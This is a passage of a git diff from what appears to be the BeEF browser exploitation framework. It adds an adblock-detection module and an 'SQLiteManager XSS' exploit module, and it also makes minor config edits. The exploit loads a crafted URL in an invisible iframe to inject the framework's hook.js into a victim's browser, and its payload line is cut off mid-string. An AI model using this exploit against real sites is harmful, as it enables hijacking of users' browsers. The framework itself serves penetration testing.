', <%= @command_id %>, 'result=Adblock returned an error');
+ } else if (img.getAttribute("attr") == "load") {
+ beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=Adblock is disabled or not installed');
+ } else if (img.getAttribute("attr") == "start") {
+ beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=Adblock is enabled');
+ };
+ document.body.removeChild(img);
+ }, 10000);
+
+});
diff --git a/modules/browser/detect_simple_adblock/config.yaml b/modules/browser/detect_simple_adblock/config.yaml
new file mode 100644
index 000000000..b0ac675ba
--- /dev/null
+++ b/modules/browser/detect_simple_adblock/config.yaml
@@ -0,0 +1,16 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+beef:
+ module:
+ detect_simple_adblock:
+ enable: true
+ category: "Browser"
+ name: "Detect Simple Adblock"
+ description: "This module checks if the Simple Adblock module is active."
+ authors: ["sussurro"]
+ target:
+ working: ["IE"]
+ not_working: ["All"]
diff --git a/modules/browser/detect_simple_adblock/module.rb b/modules/browser/detect_simple_adblock/module.rb
new file mode 100644
index 000000000..83b626b3e
--- /dev/null
+++ b/modules/browser/detect_simple_adblock/module.rb
@@ -0,0 +1,14 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+class Detect_simple_adblock< BeEF::Core::Command
+
+ def post_execute
+ content = {}
+ content['simple_adblock'] = @datastore['simple_adblock'] if not @datastore['simple_adblock'].nil?
+ save content
+ end
+
+end
diff --git a/modules/chrome_extensions/get_chrome_extensions/config.yaml b/modules/chrome_extensions/get_chrome_extensions/config.yaml
deleted file mode 100644
index d5519b296..000000000
--- a/modules/chrome_extensions/get_chrome_extensions/config.yaml
+++ /dev/null
@@ -1,16 +0,0 @@
-#
-# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
-# Browser Exploitation Framework (BeEF) - http://beefproject.com
-# See the file 'doc/COPYING' for copying permission
-#
-beef:
- module:
- detect_chrome_extensions:
- enable: true
- category: "Chrome Extensions"
- name: "Get Chrome Extensions"
- description: "This module detects if any of the top 1,000 Chrome extensions are installed."
- authors: ["koto", "bcoles"]
- target:
- working: ["C"]
- not_working: ["All"]
diff --git a/modules/exploits/sqlitemanager_xss/command.js b/modules/exploits/sqlitemanager_xss/command.js
new file mode 100644
index 000000000..c919b9bb6
--- /dev/null
+++ b/modules/exploits/sqlitemanager_xss/command.js
@@ -0,0 +1,17 @@
+//
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+beef.execute(function() {
+
+ var uri = '<%= @uri.gsub(/'/, "\\'") %>';
+
+ var serendipity_iframe = beef.dom.createInvisibleIframe();
+ serendipity_iframe.setAttribute('src', uri);
+
+ beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");
+
+});
+
diff --git a/modules/exploits/sqlitemanager_xss/config.yaml b/modules/exploits/sqlitemanager_xss/config.yaml
new file mode 100644
index 000000000..c1cb0a5a8
--- /dev/null
+++ b/modules/exploits/sqlitemanager_xss/config.yaml
@@ -0,0 +1,15 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+beef:
+ module:
+ sqlitemanager_xss:
+ enable: true
+ category: ["Exploits", "XSS"]
+ name: "SQLiteManager XSS"
+ description: "Attempts to hook SQLiteManager using XSS.
Tested on version 1.2.4 however other versions are likely to be vulnerable."
+ authors: ["bcoles"]
+ target:
+ unknown: ["ALL"]
diff --git a/modules/exploits/sqlitemanager_xss/module.rb b/modules/exploits/sqlitemanager_xss/module.rb
new file mode 100644
index 000000000..970693e67
--- /dev/null
+++ b/modules/exploits/sqlitemanager_xss/module.rb
@@ -0,0 +1,23 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+class Sqlitemanager_xss < BeEF::Core::Command
+
+ def self.options
+
+ configuration = BeEF::Core::Configuration.instance
+ hook_uri = "http://#{configuration.get("beef.http.host")}:#{configuration.get("beef.http.port")}/hook.js"
+
+ return [
+ {'name' => 'uri', 'ui_label' => 'Target URL', 'value' => 'http://127.0.0.1/sqlite/index.php?dbsel=1"> @datastore['result']})
+ end
+
+end
diff --git a/modules/phonegap/phonegap_check_connection/config.yaml b/modules/phonegap/phonegap_check_connection/config.yaml
index d7f286e08..ab6256e52 100644
--- a/modules/phonegap/phonegap_check_connection/config.yaml
+++ b/modules/phonegap/phonegap_check_connection/config.yaml
@@ -10,8 +10,8 @@ beef:
phonegap_check_connection:
enable: true
category: "Phonegap"
- name: "Check connection"
- description: "Find out connection type e.g. Wifi, 3G.."
+ name: "Check Connection"
+ description: "Find out the network connection type e.g. Wifi, 3G."
authors: ["mh"]
target:
working: ["All"]